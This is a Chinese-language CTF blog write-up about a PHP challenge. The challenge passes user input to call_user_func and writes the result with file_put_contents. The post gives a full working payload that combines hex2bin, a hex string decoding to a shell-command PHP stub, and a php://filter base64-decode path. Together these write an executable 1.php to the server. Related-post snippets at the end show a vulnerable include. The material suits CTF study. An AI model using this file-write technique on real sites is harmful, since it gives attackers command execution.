伪协议配合回调函数写入命令

最新推荐文章于 2024-06-19 15:00:41 发布
最新推荐文章于 2024-06-19 15:00:41 发布
阅读量249 收藏 4
点赞数 10
文章标签: CTF php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68357559/article/details/137249209
版权 
<?php


highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    file_put_contents($v3,$str);
}
else{
    die('hacker');
}


?>

 

首先我们看到file_put_contents函数要条件反射
1.它可以配合伪协议

file_put_contents()

//用来写文件进去,其中文件名参数是支持伪协议的,用于将第二个参数content进行过滤器后再写进文件里面去

file_put_contents($_POST[‘filename’], “”);

当然这道题可以学到很多东西,首先我们先分析一下
v3得是一个文件把,写入一些命令执行的东西,那我们可以通过伪协议直接生成文件

?V3=php://filter/write=convert.base64-decode/resource=1.php
新姿势通过十六进制配合call_user_func函数进行写入命令执行
思维太局限于assert函数配合phpinfo(),我们可以通过十六进制
v2=115044383959474e6864434171594473
解码会得到PD89YGNhdCAqYDs(<?=cat *;)
其实就是通过解码(4字节一组),能绕过substr的截断

发现已经绕过截断函数

然后payload: GET v2=115044383959474e6864434171594473&v3=php://filter/write=convert.base64- decode/resource=1.php POST v1=hex2bin 最后访问1.php

问巻
关注
  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php审计--通过php伪协议配合文件包含写入shell
qq_29437513的博客
08-13 698
有群友问过这样一个问题,, http:xxx/123.jpg 传上这样的图片马能不能连到shell? 这有几种情况,,,php解析吧jpg解析成php,iis吧jpg解析成php都可以 我们这里通过php伪协议+存在文件包含的页面做个复现 先写个include函数,include后面没做处理的 <?php $file = $_GET['a']; include "$file"; to 然后,,如果目录阶乘符不能用,url编码后无法绕过,尝试file协议 在我本地环境www目录下存在一个无类型的a
cmd echo写入shell_学习笔记-命令执行及花式bypass写shell
weixin_30801745的博客
01-26 1696
命令执行的坑其实早就想填了。最早是因为校赛时,easyphp一题自己因为不熟悉命令执行的一些特性导致套娃题绕到最后一层却没拿到flag。当时十分不爽,下定决心要好好了解下命令执行的相关知识点。关于命令执行我大体上归为php绕过+rce两类。php的难点主要是在绕过写shell上,而linux的知识主要在RCE达成上。先从简单说起:linux 命令& RCErce,即remote comma...
PHP伪协议详解
windowshht的博客
03-16 541
PHP伪协议是一种方便的工具,可以用于读取和写入文件,以及对数据流进行过滤。使用PHP伪协议时,应注意安全性问题。不要使用PHP伪协议来执行远程文件,除非您确定该文件是安全的。使用PHP伪协议来读取远程文件时,应使用过滤器来对数据进行验证。*使用PHP伪协议写入文件时,应确保文件具有适当的访问权限。
PHP伪协议总结
weixin_52385170的博客
01-15 587
php伪协议 封装协议 内置协议
文件包含之伪协议的使用
qq_56438857的博客
07-29 622
之前一直对文件包含的伪协议懵懵懂懂,今天重新学了一下,一下就升华了。顺便整理了一些小笔记,供大家交流学习。
[ZJCTF 2019]NiZhuanSiWei
qq_40860153的博客
10-10 174
1.打开题目看得到 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1&
解决ajax回调函数返回的字符串乱码问题
12-11
ServletActionContext.getResponse().setContentType(“text/json;... 您可能感兴趣的文章:jQuery Ajax Post 回调函数不执行问题的解决方法Javascript基于AJAX回调函数传递参数实例分析ajax回调函数中使用$(this)取不到
通过伪协议解决父页面与iframe页面通信的问题
09-03
本文主要讨论如何通过伪协议来解决在特定情况下父页面与iframe页面通信的难题。 首先,我们要理解同源策略。同源策略是浏览器实施的一种安全策略,它限制了来自不同源的文档或脚本之间互相访问。如果父页面和iframe...
MATLAB——读写文件函数命令汇总
01-20
(1)写入excel文件:xlswrite()函数 常用语句为:xlswrite(filename,Data,sheet,Range) 其中:filename表示文件名称;Data表示待写入的数据、文本;sheet表示写入excel中的工作表标签,该参数缺省时,默认为Sheet1...
东芝中央空调控制协议Modbus!
05-23
应用函数代码部分列出了Modbus协议支持的各种函数代码,包括读取寄存器、写入寄存器、读取coil状态、写入coil状态等。 异常响应部分介绍了Modbus协议在出现异常情况下的响应机制,包括错误代码、错误信息等。 ...
火山PC内存加载dll及静态方法参数回调函数
04-06
资源原址:https://www.lkuaiy.com/rsdetails?page=1&id=16461393358691595 转载至利快云
小迪安全笔记
ANYOUZHEN的博客
03-14 6323
1.后门 黑客留下的一个方便下次进入的网址 2.脚本语言主流php java python 3.常见漏洞 上传 代码执行 sql注入 变量覆盖 逻辑漏洞 反序列化 xss
深入解析PHP函数
NatLindsay的博客
06-17 493
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP中,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见的函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
ImageNet-1k 测试集 两大坑
weixin_42815846的博客
06-16 333
不然就会浪费一次提交机会,直接提交submission.txt就可以,注意每排5个预测结果,用于计算top5 error。2、用torchvision自带的imagenet dataset类加载进来的数据的类别标签,)但torchvision自动给你弄成。1、官方网站提交test set标签时,,但是他们的类别id不一样!以chickadee 山雀为例。这是torchvision的。他们的WNID都一样,
Linux-安装及管理程序
最新发布
A6985HG的博客
06-19 670
定义:本地Yum源是指将软件包存储在本地服务器或存储设备上的源。这些软件包可以是从官方源下载后本地存储的,也可以是用户自己编译的软件包。优点:本地Yum源的主要优势在于访问速度和可控性。由于软件包位于本地网络或服务器上,因此安装和更新速度快,尤其是在没有稳定互联网连接或需要大规模部署的情况下更为实用。
教育培训系统(FastAdmin+ThinkPHP+Unipp)
2401_84413757的博客
06-17 485
教育培训系统是一个集在线课程、学习资源、互动交流等功能于一体的综合性学习平台。它打破了传统教育的时空限制,让学习变得更加灵活自由。学员们可以根据自己的时间和需求,随时随地访问系统,选择感兴趣的课程进行学习。教育培训系统以其便捷的学习方式、丰富的资源和智能的评估功能,为我们的学习之路增添了色彩。让我们一起拥抱这个全新的学习平台,让学习变得更简单、更有趣!
源码编译安装LAMP
zheshijiuyue的博客
06-16 859
通过用源码包的形式安装LAMP,以及phpMyAdmin的使用
ffmpeg 回调函数
08-26
FFmpeg是一个功能强大的开源多媒体处理库,它提供了一个底层的编解码器和多媒体处理的框架。在使用FFmpeg时,可以使用回调函数来处理各种事件和数据。 FFmpeg中的回调函数通常用于处理音视频流的解码、编码、过滤以及其他相关操作。下面是一些常见的回调函数: 1. AVIOInterruptCB:用于处理IO中断的回调函数。当需要中断打开、读取、写入等操作时,可以通过设置此回调函数来实现中断处理。 2. AVFormatContext的AVOpenCallback和AVReadCallback:用于自定义输入流的打开和读取操作。可以通过这两个回调函数实现自定义的输入流读取。 3. AVFormatContext的AVWriteCallback:用于自定义输出流的写入操作。可以通过这个回调函数实现自定义的输出流写入。 4. AVCodecContext的get_buffer2回调函数:用于自定义音视频解码器的内存分配。通过自定义这个回调函数,可以实现对内存的灵活控制。 5. AVFilter的回调函数:用于自定义音视频过滤器。可以通过设置不同类型的回调函数来实现自定义的音视频过滤效果。 这只是一些常见的回调函数示例,实际使用时可能根据具体需求和场景进行自定义。在使用FFmpeg时,可以参考FFmpeg官方文档和示例代码来了解更多有关回调函数的详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值